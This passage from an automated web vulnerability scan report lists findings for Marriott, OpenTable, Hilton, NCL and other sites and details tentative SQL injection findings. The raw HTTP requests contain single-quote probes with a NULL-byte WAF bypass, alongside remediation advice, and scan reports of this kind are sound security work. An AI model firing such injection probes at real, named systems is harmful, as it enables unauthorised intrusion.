20.266. http://www.royalcaribbean.com/js/jquery.colorbox.js

20.267. http://www1.hilton.com/common/js/jquery/jquery-autocomplete.js

20.268. http://www1.hilton.com/common/js/jquery/jquery-dimensions.js

20.269. http://www1.hilton.com/common/js/jquery/jquery.bgiframe.js

20.270. http://www1.hilton.com/en_US/hi/customersupport/index.do

20.271. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

20.272. http://www2.ncl.com/about/contact-us

20.273. http://www2.ncl.com/about/environmental-commitment

20.274. http://www2.ncl.com/faq

20.275. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts

20.276. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview

20.277. http://www2.ncl.com/freestyle-cruise/golf/overview

20.278. http://www2.ncl.com/sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js

20.279. http://www2.ncl.com/sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js

20.280. http://www2.ncl.com/sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js

20.281. http://www2.ncl.com/sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js

20.282. http://www2.ncl.com/sites/default/files/js/js_fdd3c7be863ac5dd808fad0ba5949c4a.js

20.283. http://www3.hilton.com/en_US/hi/brand/popup/preExistingCertificate.htm

20.284. http://www3.hilton.com/skins/common/js_comp/r1core.comp.min.js

20.285. http://www3.hilton.com/skins/common/js_comp/tracking.comp.min.js

20.286. http://www3.hilton.com/skins/en_US/js_comp/search.comp.min.js

21. Private IP addresses disclosed

21.1. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

21.2. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

21.3. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

21.4. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

21.5. http://static.ak.facebook.com/images/loaders/indicator_white_large.gif

21.6. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

21.7. http://www.connect.facebook.com/widgets/fan.php

21.8. http://www.connect.facebook.com/widgets/fan.php

21.9. http://www.connect.facebook.com/widgets/fan.php

21.10. http://www.cruises.com/promotion/balcony-suite-cruises.do

21.11. http://www.cruises.com/promotion/weekend-cruises.do

21.12. http://www.cruisesonly.com/promotion/bermuda-cruises.do

21.13. http://www.cruisesonly.com/sharedwidgets/Caribbean.do

21.14. http://www.facebook.com/extern/login_status.php

21.15. http://www.facebook.com/extern/login_status.php

21.16. http://www.facebook.com/plugins/like.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/like.php

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.facebook.com/plugins/like.php

21.31. http://www.facebook.com/plugins/like.php

21.32. http://www.facebook.com/plugins/like.php

21.33. http://www.facebook.com/plugins/like.php

21.34. http://www.facebook.com/plugins/like.php

21.35. http://www.facebook.com/plugins/likebox.php

21.36. http://www.facebook.com/plugins/likebox.php

21.37. http://www.facebook.com/widgets/fan.php

21.38. http://www.facebook.com/widgets/fan.php

21.39. http://www2.ncl.com/

21.40. http://www2.ncl.com/about/careers/overview

21.41. http://www2.ncl.com/about/contact-us

21.42. http://www2.ncl.com/about/environmental-commitment

21.43. http://www2.ncl.com/about/staying-connected-sea-internet-access

21.44. http://www2.ncl.com/cruise-destinations

21.45. http://www2.ncl.com/faq

21.46. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts

21.47. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview

21.48. http://www2.ncl.com/freestyle-cruise/cruise-rewards

21.49. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations

21.50. http://www2.ncl.com/freestyle-cruise/freestyle-dining

21.51. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview

21.52. http://www2.ncl.com/freestyle-cruise/golf/overview

21.53. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages

21.54. http://www2.ncl.com/freestyle-cruise/nickelodeon

21.55. http://www2.ncl.com/freestyle-cruise/onboard-experience

21.56. http://www2.ncl.com/freestyle-cruise/overview

21.57. http://www2.ncl.com/freestyle-cruise/spa

21.58. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness

21.59. http://www2.ncl.com/ncl_inside_scoop

21.60. http://www2.ncl.com/ncl_inside_scoop

21.61. http://www2.ncl.com/sitemap

21.62. https://www2.ncl.com/vacations

22. Robots.txt file

22.1. http://as00.estara.com/as/InitiateCall2.jsp

22.2. http://cm.g.doubleclick.net/pixel

22.3. http://g-pixel.invitemedia.com/gmatcher

22.4. http://gs.instantservice.com/geoipAPI.js

22.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

22.6. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s41431111721321

22.7. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740

22.8. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

22.9. http://opentable.ugc.bazaarvoice.com/static/0938/r_5_ispacer.gif

22.10. http://reviews.opentable.com/0938/200/reviews.htm

22.11. http://rs.instantservice.com/resources/smartbutton/7534/II3_Servers.js

22.12. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

22.13. https://secure2.hilton.com/en_US/hi/reservation/book.htm

22.14. https://secure3.hilton.com/en_US/hi/reservation/book.htm

22.15. http://tag.yieldoptimizer.com/ps/ps

22.16. http://www.hilton.com/en/hi/promotions/hi_resorts/index.jhtml

22.17. http://www.marriott.com/default.mi

22.18. http://www.marriottvacationclub.com/index.shtml

22.19. http://www.opentable.com/frontdoor/default.aspx

22.20. https://www2.ncl.com/vacations

22.21. https://www201.americanexpress.com/cards/Applyfservlet

22.22. http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm

23. Cacheable HTTPS response

23.1. https://secure2.hilton.com/en_US/hi/reservation/book.htm

23.2. https://secure2.hilton.com/favicon.ico

23.3. https://www.cruisesonly.com/bcss/default.asp

23.4. https://www.cruisesonly.com/lib/javascript/display/iphone_js.asp

23.5. https://www.marriott.com/!crd_prm!.!cm

23.6. https://www.marriott.com/default.mi

23.7. https://www.marriottregistry.com/

23.8. https://www.ncl.com/nclweb/common/TealeafTarget.jsp

23.9. https://www.ncl.com/nclweb/secure/bookedGuestLanding.html

23.10. https://www.ncl.com/nclweb/secure/loginBookedGuest.html

23.11. https://www2.ncl.com/files/json/promo.json

23.12. https://www2.ncl.com/files/json/query_all.json

24. HTML does not specify charset

24.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92

24.2. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96

24.3. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96

24.4. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96

24.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96

24.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96

24.7. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

24.8. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

24.9. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

24.10. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

24.11. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95

24.12. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95

24.13. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95

24.14. http://fls.doubleclick.net/activityi

24.15. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml

24.16. https://secure.hilton.com/en/hi/login/login.jhtml

24.17. http://www.celebritycruises.com/html/en_US/plan-and-book/plan-your-cruise/result-markup.html

24.18. http://www.cruises.com/ajaxhtml/filterdynamic.do

24.19. http://www.cruises.com/code/webdata/webdataregister.asp

24.20. http://www.cruises.com/i/shadow.png

24.21. http://www.cruises.com/idle.do

24.22. http://www.cruisesonly.com/ajaxhtml/filterdynamic.do

24.23. http://www.cruisesonly.com/code/webdata/webdataregister.asp

24.24. http://www.cruisesonly.com/groupcruises/email/email_popup.asp

24.25. http://www.cruisesonly.com/includes/search_ads.css

24.26. http://www.cruisesonly.com/includes/stylesheet_test.css

24.27. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js

24.28. http://www.hilton.com/en/hi/brand/about.jhtml

24.29. http://www.hilton.com/en/hi/info/site_usage.jhtml

24.30. http://www.hilton.com/en/hi/promotions/hi_resorts/index.jhtml

24.31. http://www.rooms.com/includes/sidebars/ob-search-collateral/PopupCalendar.html

25. Content type incorrectly stated

25.1. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96

25.2. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96

25.3. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96

25.4. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96

25.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96

25.6. http://gs.instantservice.com/geoipAPI.js

25.7. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_850.aspx

25.8. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/1338891380/x22/RGM/OPT_1x1.jpg_950x35/1x1-4.jpg/4d686437616b356934616b41434d6658

25.9. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/92427839/Position1/RGM/OPT_1x1.jpg_980x65/1x1-5.jpg/4d686437616b356934616b41434d6658

25.10. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

25.11. https://secure.hilton.com/en/hhonors/css/basic.css

25.12. http://vacations.rooms.com/caux/html/tracking.js

25.13. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

25.14. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-bd-webfont.woff

25.15. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-lt-webfont.woff

25.16. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-roman-webfont.woff

25.17. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-th-webfont.woff

25.18. http://www.celebritycruises.com/fonts/helveticaneueltstd-bd-webfont.woff

25.19. http://www.celebritycruises.com/fonts/helveticaneueltstd-lt-webfont.woff

25.20. http://www.celebritycruises.com/fonts/helveticaneueltstd-roman-webfont.woff

25.21. http://www.celebritycruises.com/fonts/helveticaneueltstd-th-webfont.woff

25.22. http://www.celebritycruises.com/search/loadSearchJSON.do

25.23. http://www.cruises.com/code/webdata/webdataregister.asp

25.24. http://www.cruises.com/idle.do

25.25. http://www.cruises.com/images_unique/cs/CS_CHATbanner_w.jpg

25.26. http://www.cruises.com/images_unique/cs/CS_FAQbanner_w.jpg

25.27. http://www.cruises.com/images_unique/cs/CS_HeadlineBanner_w.jpg

25.28. http://www.cruisesonly.com/code/webdata/webdataregister.asp

25.29. http://www.facebook.com/extern/login_status.php

25.30. http://www.marriott.com/!crd_prm!.!cm

25.31. https://www.marriott.com/!crd_prm!.!cm

25.32. http://www.ncl.com/nclweb/common/query_all.json

25.33. http://www.opentable.com/httphandlers/MetroData.aspx

25.34. http://www.orbitz.com/hotelimages/346/12346/Wellington-Hotel-Guest-Room-10.jpg

25.35. http://www1.hilton.com/brand/hi/media/images/buttons/button_pushtotalk.gif

25.36. http://www1.hilton.com/common/media/images/misc/icon_arrow_gray.gif

25.37. http://www1.hilton.com/common/media/images/misc/photogallery_thumbnails_background.gif

25.38. http://www1.hilton.com/en_US/common/media/images/headers/header_talktousnow.gif

25.39. http://www1.hilton.com/en_US/hi/media/images/buttons/button_sendform.gif

25.40. http://www1.hilton.com/favicon_hi.ico

25.41. http://www2.ncl.com/files/json/promo.json

25.42. http://www2.ncl.com/files/json/query_all.json

25.43. https://www2.ncl.com/files/json/promo.json

25.44. https://www2.ncl.com/files/json/query_all.json

26. Content type is not specified



1. SQL injection
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s45922061523888 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.marriott.com
Path:   /b/ss/marriottglobal/1/H.20.2/s45922061523888

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/marriottglobal/1/H.20.2/s45922061523888?AQB=1&ndh=1&t=3/9/2011%207%3A56%3A0%201%20300&vmt=4E57E5D3&vmf=marriottinternational.122.2o7.net&ce=UTF-8&cdp=2&pageName=www.marriott.com/search/findHotels.mi&g=http%3A//www.marriott.com/search/findHotels.mi&r=http%3A//www.marriott.com/default.mi&c1=Reservation%20Process%20Step%201%20%28Citywide%29%3A%20Submitted%20Citywide%20Hotel%20Search&c2=Reservation%20Process%20Step%201%3A%20Submitted%20Hotel%20Search&v2=No%20Dates%20Entered&c5=US&c8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&v11=InCity%3AwithoutDates&v12=bos%3Ama%3Aus&v13=all&c15=1&v15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&c23=50&v35=First%20Visit&v41=US&c49=79%3AD%3AV%3ABOSLA%3A1.7%3A%3ABOSWF%3A2.1%3A%3ABOSLW%3A2.4%3A%3ABOSCH%3A2.5%3A%3ABOSTW%3A2.9%3A%3ABOSRT%3A3.1%3A%3ABOSDM%3A3.3%3A%3ABOSSO%3A3.9%3A%3ABOSCO%3A3.9%3A%3ABOSDT%3A3.9%3A&tnt=32629%3A1%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lv%3D1317646560257%7C1412254560257%3B%20s_lv_s%3DFirst%2520Visit%7C1317648360257%3B

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:01:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/marriottglobal/1/H.20.2/s45922061523888?AQB=1&ndh=1&t=3/9/2011%207%3A56%3A0%201%20300&vmt=4E57E5D3&vmf=marriottinternational.122.2o7.net&ce=UTF-8&cdp=2&pageName=www.marriott.com/search/findHotels.mi&g=http%3A//www.marriott.com/search/findHotels.mi&r=http%3A//www.marriott.com/default.mi&c1=Reservation%20Process%20Step%201%20%28Citywide%29%3A%20Submitted%20Citywide%20Hotel%20Search&c2=Reservation%20Process%20Step%201%3A%20Submitted%20Hotel%20Search&v2=No%20Dates%20Entered&c5=US&c8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&v11=InCity%3AwithoutDates&v12=bos%3Ama%3Aus&v13=all&c15=1&v15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&c23=50&v35=First%20Visit&v41=US&c49=79%3AD%3AV%3ABOSLA%3A1.7%3A%3ABOSWF%3A2.1%3A%3ABOSLW%3A2.4%3A%3ABOSCH%3A2.5%3A%3ABOSTW%3A2.9%3A%3ABOSRT%3A3.1%3A%3ABOSDM%3A3.3%3A%3ABOSSO%3A3.9%3A%3ABOSCO%3A3.9%3A%3ABOSDT%3A3.9%3A&tnt=32629%3A1%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lv%3D1317646560257%7C1412254560257%3B%20s_lv_s%3DFirst%2520Visit%7C1317648360257%3B

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:01:09 GMT
Server: Omniture DC/2.0.0
xserver: www86
Content-Length: 0
Content-Type: text/html


1.2. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.opentable.com
Path:   /b/ss/otcom/1/H.22.1--NS/0

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/otcom/1/H.22.1--NS%00'/0?AQB=1&pccr=true&vidn=2744D8A0051597FB-40000176E00002C7&g=none&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: o.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:58:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/otcom/1/H.22.1--NS was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/otcom/1/H.22.1--NS%00''/0?AQB=1&pccr=true&vidn=2744D8A0051597FB-40000176E00002C7&g=none&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: o.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:58:57 GMT
Server: Omniture DC/2.0.0
xserver: www648
Content-Length: 0
Content-Type: text/html


1.3. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s41395109691657 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.opentable.com
Path:   /b/ss/otrestref/1/H.22.1/s41395109691657

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/otrestref/1%00'/H.22.1/s41395109691657?AQB=1&ndh=1&t=3%2F9%2F2011%207%3A57%3A4%201%20300&ce=UTF-8&pageName=500error&g=http%3A%2F%2Fwww.opentable.com%2Fjaspers-corner-tap-and-kitchen'%3Frid%3D200%26restref%3D200&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&ch=metrounspecified&c1=metrounspecified%3Aerror&v1=metrounspecified%3Aerror&c2=metrounspecified%3Aerror&v2=metrounspecified%3Aerror&c7=Logged%20Out&c9=500error&c12=New&v12=New&c13=500error&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&v36=anonymous&c38=500error&v43=500error&v50=500error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; s_sq=%5B%5BB%5D%5D; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:05:32 GMT
Server: Omniture DC/2.0.0
Content-Length: 409
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/otrestref/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/otrestref/1%00''/H.22.1/s41395109691657?AQB=1&ndh=1&t=3%2F9%2F2011%207%3A57%3A4%201%20300&ce=UTF-8&pageName=500error&g=http%3A%2F%2Fwww.opentable.com%2Fjaspers-corner-tap-and-kitchen'%3Frid%3D200%26restref%3D200&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&ch=metrounspecified&c1=metrounspecified%3Aerror&v1=metrounspecified%3Aerror&c2=metrounspecified%3Aerror&v2=metrounspecified%3Aerror&c7=Logged%20Out&c9=500error&c12=New&v12=New&c13=500error&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&v36=anonymous&c38=500error&v43=500error&v50=500error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; s_sq=%5B%5BB%5D%5D; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:05:35 GMT
Server: Omniture DC/2.0.0
